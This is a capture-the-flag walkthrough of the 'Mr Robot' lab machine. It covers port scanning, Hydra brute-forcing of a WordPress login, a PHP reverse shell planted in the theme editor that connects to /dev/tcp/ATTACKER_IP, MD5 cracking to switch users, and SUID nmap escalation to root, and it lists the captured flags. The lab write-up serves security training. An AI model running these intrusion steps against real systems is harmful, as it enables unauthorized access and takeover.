---
OVERVIEW
--------
Mr Robot is a Medium-rated Linux CTF themed around the TV show. Three keys are hidden
across the machine. The path involves web enumeration, WordPress credential bruteforcing,
a PHP reverse shell via the Theme Editor, MD5 hash cracking to pivot to a second user,
and privilege escalation via a SUID nmap binary running in interactive mode.
Target IP: 10.129.145.62
---
SUMMARY
-------
Step 1 — Recon: Nmap + Gobuster
Step 2 — robots.txt: Key 1 + custom wordlist discovered
Step 3 — Enum: WordPress confirmed, wp-login.php found
Step 4 — Bruteforce: Hydra username enum → elliot | Hydra password brute → ER28-0652
Step 5 — Foothold: PHP reverse shell via WP Theme Editor (Twenty Fifteen → 404.php)
Step 6 — Pivot: password.raw-md5 cracked → su robot → Key 2
Step 7 — PrivEsc: SUID nmap --interactive → !sh → root → Key 3
---
FLAGS
-----
Key 1: 073403c8a58a1f80d943455fb30724b9 (robots.txt → /key-1-of-3.txt)
Key 2: 822c73956184f694993bede3eb39f959 (/home/robot/key-2-of-3.txt)
Key 3: 04787ddef27c3dee1ee161b21670b4e4 (/root/key-3-of-3.txt)
---
RECON
-----
Phase 1 — fast scan of all ports:
nmap -p- -T4 --min-rate 1000 --open --max-retries 2 10.129.145.62
Open ports: 22 (SSH), 80 (HTTP), 443 (HTTPS)
Phase 2 — deep scan on open ports:
nmap -sC -sV -p 22,80,443 10.129.145.62
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
SSL cert: commonName=www.example.com (expired)
Directory brute force:
gobuster dir -u http://10.129.145.62 -w /usr/share/wordlists/dirb/common.txt -x php,txt
Notable results:
/wp-login.php (Status: 200) — WordPress login page
/wp-admin (Status: 301) — WordPress admin panel
/robots.txt (Status: 200)
/license (Status: 200)
/readme (Status: 200)
/phpmyadmin (Status: 403)
---
KEY 1 — robots.txt
-------------------
curl http://10.129.145.62/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
curl http://10.129.145.62/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Download the custom wordlist:
wget http://10.129.145.62/fsocity.dic
Remove duplicates (858,160 → 11,451 lines):
sort -u fsocity.dic > fsocity_clean.dic
wc -l fsocity.dic fsocity_clean.dic
858160 fsocity.dic
11451 fsocity_clean.dic
---
WORDPRESS CREDENTIAL BRUTEFORCE
--------------------------------
WordPress reveals different error messages for invalid usernames vs wrong passwords,
making username enumeration possible.
Step 1 — enumerate valid usernames:
hydra -L fsocity_clean.dic -p test 10.129.145.62 http-post-form \
"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -t 30
[80][http-post-form] host: 10.129.145.62 login: elliot password: test
Valid username: elliot
Step 2 — bruteforce password for elliot:
hydra -l elliot -P fsocity_clean.dic 10.129.145.62 http-post-form \
"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username" -t 30
[80][http-post-form] host: 10.129.145.62 login: elliot password: ER28-0652
Credentials: elliot / ER28-0652
---
FOOTHOLD — PHP Reverse Shell via Theme Editor
---------------------------------------------
Login at http://10.129.145.62/wp-login.php with elliot:ER28-0652
Navigate to: Appearance → Editor → 404.php (Twenty Fifteen theme, active)
Replace the entire file content with:
& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>Click Update File.
Start listener on attack machine:
nc -nlvp 4444
Trigger the shell by visiting:
http://10.129.145.62/wp-content/themes/twentyfifteen/404.php
Shell received:
connect to [192.168.133.223] from (UNKNOWN) [10.129.145.62] 40242
bash: no job control in this shell
/wordpress/htdocs/wp-content/themes/twentyfifteen$
Upgrade to interactive TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
---
KEY 2 — Hash Crack + User Pivot
---------------------------------
Find key locations:
find / -name "key-2-of-3.txt" 2>/dev/null
/home/robot/key-2-of-3.txt
List /home/robot/:
ls -la /home/robot/
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
Read the hash (world-readable):
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Crack at crackstation.net:
c3fcd3d76192e4007dfb496cca67e13b → md5 → abcdefghijklmnopqrstuvwxyz
Switch to robot user:
su robot
Password: abcdefghijklmnopqrstuvwxyz
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
---
PRIVILEGE ESCALATION — SUID nmap Interactive Mode
--------------------------------------------------
Find SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Notable: /usr/local/bin/nmap
nmap version 3.81 supports --interactive mode which allows shell command execution.
Because nmap has the SUID bit set (runs as root), any shell spawned inherits root.
nmap --interactive
Starting nmap V. 3.81
nmap> !sh
# cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Root shell obtained.
---
ATTACK CHAIN
------------
robots.txt → Key 1 + fsocity.dic wordlist
→ Hydra username enum → elliot
→ Hydra password brute → ER28-0652
→ WP Theme Editor → 404.php PHP reverse shell
→ www-data shell
→ /home/robot/password.raw-md5 → MD5 cracked → abcdefghijklmnopqrstuvwxyz
→ su robot → Key 2
→ SUID nmap --interactive → !sh → root → Key 3
---
KEY TAKEAWAYS
-------------